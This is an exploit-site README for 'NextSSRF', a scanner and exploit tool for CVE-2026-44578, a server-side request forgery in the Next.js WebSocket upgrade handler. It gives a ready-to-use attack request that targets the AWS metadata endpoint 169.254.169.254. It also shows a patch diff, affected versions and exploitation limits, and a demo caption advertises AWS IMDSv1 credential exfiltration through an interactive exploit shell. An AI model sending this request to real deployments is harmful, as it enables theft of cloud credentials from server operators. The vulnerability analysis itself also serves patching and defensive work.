Share
## https://sploitus.com/exploit?id=08996502-7D7F-5650-B576-8EBA5250EC2D
# NEXT-SSRF
SSRF โ CVE-2026-44578 Scanner & Exploit โ โ Next.js WebSocket Upgrade Handler SSRF
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ NextSSRF โ CVE-2026-44578 Scanner & Exploit โ
โ Next.js WebSocket Upgrade Handler SSRF โ
โ Affected: 13.4.13 โ 15.5.15, 16.0.0 โ 16.2.4 โ
โ @mitsec / ynsmroztas โ Bug Bounty Tooling โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```





**CVE-2026-44578** โ Server-Side Request Forgery via Next.js WebSocket Upgrade Handler
[Overview](#overview) ยท [Install](#install) ยท [Usage](#usage) ยท [Pipeline](#pipeline) ยท [Shodan](#shodan) ยท [Interactive](#interactive-shell) ยท [Disclaimer](#disclaimer)
---
## Overview
On May 11, 2026, Vercel patched **CVE-2026-44578** (CVSS 8.6): an unauthenticated SSRF in Next.js's WebSocket upgrade handler affecting all self-hosted deployments from **13.4.13** onward.
### Mechanism
```
GET http://169.254.169.254/latest/meta-data/ HTTP/1.1 โ absolute-form URI
Host: vulnerable-nextjs.com
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
```
The `//` in `http://` triggers `normalizeRepeatedSlashes` early-exit, setting `statusCode: 308` and `finished: true`. The vulnerable upgrade handler **ignores both flags** and calls `proxyRequest` when `parsedUrl.protocol` is truthy โ proxying the request to the attacker-controlled host on **port 80**.
```diff
// router-server.ts (vulnerable)
- if (parsedUrl.protocol) {
- return await proxyRequest(req, socket, parsedUrl, head)
+ if (finished && parsedUrl.protocol) {
+ if (!statusCode) {
+ return await proxyRequest(req, socket, parsedUrl, head)
```
### Affected Versions
| Product | Vulnerable | Fixed |
|-----------------|--------------------|----------|
| Next.js | 13.4.13 โ 15.5.15 | 15.5.16 |
| Next.js | 16.0.0 โ 16.2.4 | 16.2.5 |
| Vercel-hosted | โ
NOT affected | N/A |
### Limitations
- **GET only** (no POST/PUT)
- **Port 80 only** (explicit ports stripped by URL normalization)
- AWS **IMDSv2** not exploitable (requires PUT token)
- GCP metadata rejects `Upgrade: websocket` with 400
- Reverse proxies (nginx/caddy/HAProxy) block absolute-form URIs
---
## Demo

> AWS IMDSv1 credentials exfiltrated via CVE-2026-44578 โ interactive exploit shell
---